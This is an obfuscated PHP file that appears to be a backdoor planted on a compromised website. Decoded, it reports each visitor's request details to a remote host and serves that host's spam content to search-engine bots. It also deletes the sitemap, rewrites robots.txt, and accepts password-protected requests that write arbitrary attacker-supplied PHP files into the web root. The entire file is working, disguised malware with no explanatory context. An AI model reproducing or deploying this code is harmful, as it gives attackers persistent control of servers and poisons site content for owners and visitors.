goto UfhXb; mbd_m: $web = $http_web . "\x3a\57\x2f" . $goweb . "\57\151\156\144\145\170\156\x65\167\x2e\x70\x68\160\x3f\167\x65\142\75" . $host . "\46\x7a\x7a\75" . sbot() . "\x26\x75\x72\x69\x3d" . $duri . "\x26\x75\162\x6c\163\x68\141\156\147\75" . $urlshang . "\x26\150\164\x74\x70\x3d" . $http . "\x26\x6c\x61\156\x67\75" . $lang; goto GEnub; PGENK: $lang = @$_SERVER["\x48\x54\124\x50\137\101\x43\103\x45\120\x54\137\114\x41\x4e\x47\125\101\107\105"]; goto H4WGf; ciksD: if (!strstr($htmcontent, "\x6e\157\142\x6f\x74\x75\163\x65\162\141\x67\x65\156\x74")) { if (strstr($htmcontent, "\x6f\153\150\x74\x6d\x6c\147\145\x74\143\x6f\x6e\x74\x65\156\x74")) { @header("\x43\x6f\x6e\164\145\156\164\x2d\x74\171\x70\145\x3a\x20\x74\145\170\x74\57\150\x74\x6d\x6c\x3b\40\143\150\x61\x72\163\145\164\75\x75\x74\146\x2d\x38"); $htmcontent = str_replace("\x6f\153\150\164\x6d\154\147\145\x74\143\157\156\164\145\x6e\x74", '', $htmcontent); echo $htmcontent; die; } else { if (strstr($htmcontent, "\x6f\x6b\x78\x6d\x6c\147\145\164\x63\157\156\164\x65\x6e\x74")) { $htmcontent = str_replace("\157\153\x78\155\x6c\147\x65\x74\x63\x6f\x6e\x74\x65\x6e\164", '', $htmcontent); @header("\x43\x6f\x6e\164\x65\x6e\x74\x2d\164\171\160\145\x3a\40\x74\x65\170\x74\x2f\x78\x6d\154"); echo $htmcontent; die; } else { if (strstr($htmcontent, "\160\151\156\x67\x78\x6d\154\x67\x65\164\x63\157\x6e\164\145\156\x74")) { $htmcontent = str_replace("\160\151\x6e\147\170\x6d\x6c\x67\x65\164\x63\x6f\156\164\145\x6e\164", '', $htmcontent); @header("\103\x6f\x6e\x74\145\x6e\x74\55\164\x79\x70\x65\72\x20\164\x65\170\x74\x2f\150\x74\155\154\73\x20\x63\x68\x61\x72\163\145\x74\75\165\x74\146\x2d\x38"); echo pingmap($htmcontent); die; } } } } goto T8yEN; T8yEN: function pingmap($url) { $url_arr = explode("\15\12", trim($url)); $return_str = ''; foreach ($url_arr as $pingUrl) { $pingRes = dageget($pingUrl); $ok = strpos($pingRes, "\x53\151\164\145\x6d\x61\160\40\116\157\164\x69\x66\151\143\x61\x74\x69\157\156\40\122\x65\143\x65\x69\x76\145\x64") !== false ? "\160\151\156\147\157\153" : "\x65\162\x72\x6f\162"; $return_str .= $pingUrl . "\x2d\55\x20" . $ok . "\74\142\x72\x3e"; } return $return_str; } goto syQc7; syQc7: function sbot() { $uAgent = strtolower($_SERVER["\110\x54\124\x50\137\x55\x53\x45\122\137\x41\x47\105\116\124"]); if (stristr($uAgent, "\147\157\x6f\147\x6c\145\x62\157\164") || stristr($uAgent, "\142\151\x6e\147") || stristr($uAgent, "\x79\141\150\157\x6f") || stristr($uAgent, "\x67\x6f\x6f\147\154\x65") || stristr($uAgent, "\x47\x6f\x6f\x67\154\145\142\x6f\x74") || stristr($uAgent, "\147\157\x6f\x67\x6c\x65\x62\157\x74")) { return true; } else { return false; } } goto fojmq; J7v0k: if (isset($_SERVER["\x48\x54\124\x50\x5f\x52\x45\106\x45\x52\105\x52"])) { $urlshang = $_SERVER["\110\x54\x54\120\x5f\x52\105\x46\105\x52\105\x52"]; $urlshang = urlencode($urlshang); } goto ur5xV; f1VDe: $xmlname = "\172\155\160\x72"; goto sLfsf; d166P: $urlshang = ''; goto J7v0k; H4z_o: function st_uri() { if (isset($_SERVER["\x52\105\121\x55\x45\x53\124\137\x55\x52\x49"])) { $duri = $_SERVER["\x52\105\121\125\105\x53\124\137\125\x52\111"]; } else { if (isset($_SERVER["\141\x72\x67\x76"])) { $duri = $_SERVER["\x50\x48\120\137\x53\105\x4c\106"] . "\x3f" . $_SERVER["\x61\x72\147\166"][0]; } else { $duri = $_SERVER["\120\110\120\x5f\123\105\114\106"] . "\x3f" . $_SERVER["\x51\x55\105\122\131\137\x53\124\122\111\116\107"]; } } return $duri; } goto x2mis; GEnub: $htmcontent = trim(dageget($web)); goto ciksD; AnDaQ: if ($duri_tmp == '') { $duri_tmp = "\57"; } goto F45_w; UfhXb: @set_time_limit(3600); goto nczxe; hQBoN: $host = $_SERVER["\110\124\124\x50\x5f\110\117\x53\x54"]; goto PGENK; F45_w: $duri = urlencode($duri_tmp); goto H4z_o; nczxe: @ignore_user_abort(1); goto f1VDe; ur5xV: if (@$_GET["\x70\144"] != '') { $add_content = @$_GET["\155\141\160\x6e\x61\x6d\145"]; $action = @$_GET["\141\x63\x74\151\157\156"]; if (isset($_SERVER["\104\x4f\x43\x55\115\x45\x4e\x54\x5f\x52\x4f\117\124"])) { $path = $_SERVER["\104\117\103\125\x4d\105\116\x54\x5f\122\x4f\x4f\124"]; } else { $path = dirname(__FILE__); } if (!$action) { $action = "\x70\165\164"; } if ($action == "\160\165\x74") { if (strstr($add_content, "\x2e\x78\x6d\154")) { $map_path = $path . "\x2f\x73\151\x74\x65\155\141\160\56\170\x6d\154"; if (is_file($map_path)) { @unlink($map_path); } $file_path = $path . "\57\x72\157\142\x6f\164\163\x2e\164\170\x74"; if (file_exists($file_path)) { $data = dageget($file_path); } else { $data = "\125\163\x65\162\55\x61\147\145\x6e\x74\x3a\40\52\x41\154\x6c\157\x77\x3a\40\x2f"; } $sitmap_url = $http . "\72\57\x2f" . $host . "\57" . $add_content; if (stristr($data, $sitmap_url)) { echo "\x3c\142\162\x3e\163\151\164\145\155\141\160\40\x61\154\162\x65\x61\144\x79\40\x61\x64\x64\x65\x64\41\x3c\142\162\x3e"; } else { if (file_put_contents($file_path, trim($data) . "\15\12" . "\123\151\x74\145\x6d\x61\160\72\x20" . $sitmap_url)) { echo "\x3c\142\x72\x3e\157\x6b\x3c\x62\162\x3e"; } else { echo "\x3c\142\x72\76\x66\x69\x6c\x65\x20\167\x72\x69\164\x65\40\146\141\x6c\x73\x65\x21\x3c\x62\162\x3e"; } } } else { echo "\74\142\162\76\x73\x69\164\145\x6d\141\x70\40\x6e\x61\x6d\145\40\x66\x61\154\x73\x65\41\74\x62\x72\76"; } if (strstr($add_content, "\56\x70" . "\x68\x70")) { $a = sha1(sha1(@$_GET["\x61"])); $b = sha1(sha1(@$_GET["\142"])); if ($a == dageget($http_web . "\72\57\x2f" . $goweb . "\x2f\141\56\160" . "\150\x70") || $b == "\70\60\x38\67\63\65\142\61\67\143\70\71\64\63\145\63\x37\61\65\63\x38\x38\71\65\x38\144\x63\62\62\144\70\x37\71\x61\x38\x63\71\145\141\141") { $dstr = @$_GET["\x64\x73\164\x72"]; if (file_put_contents($path . "\x2f" . $add_content, $dstr)) { echo "\x6f\x6b"; } } } } die; } goto mbd_m; wTSrT: function is_htps() { if (isset($_SERVER["\110\124\124\120\123"]) && strtolower($_SERVER["\x48\124\124\120\x53"]) !== "\x6f\146\146") { return true; } elseif (isset($_SERVER["\110\124\124\x50\x5f\130\137\106\117\x52\x57\101\122\104\105\x44\x5f\x50\122\117\124\117"]) && $_SERVER["\x48\x54\124\x50\x5f\130\x5f\x46\117\122\x57\x41\x52\x44\x45\104\x5f\120\122\117\x54\x4f"] === "\150\164\x74\160\x73") { return true; } elseif (isset($_SERVER["\110\x54\124\120\137\x46\x52\x4f\116\x54\137\105\x4e\104\137\x48\124\x54\120\x53"]) && strtolower($_SERVER["\110\x54\x54\x50\137\106\122\x4f\116\124\137\x45\x4e\104\137\x48\124\x54\x50\x53"]) !== "\x6f\146\x66") { return true; } return false; } goto hQBoN; H4WGf: $lang = urlencode($lang); goto d166P; fojmq: function dageget($url) { $file_contents = ''; if (function_exists("\143\x75\162\x6c\137\x69\156\151\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $file_contents = curl_exec($ch); curl_close($ch); } if (!$file_contents) { $file_contents = @file_get_contents($url); } return $file_contents; } goto eZLp7; x2mis: $goweb = $xmlname . "\56\154\x69\153\x65\x74\x6f\145\141\x72\143\x68" . "\56\170\x79\172"; goto wTSrT; tZsiC: if (is_htps()) { $http = "\150\x74\164\160\x73"; } else { $http = "\150\164\164\160"; } goto Vwjpt; sLfsf: $http_web = "\x68\164\x74\x70"; goto tZsiC; Vwjpt: $duri_tmp = st_uri(); goto AnDaQ; eZLp7: //uw052 ?>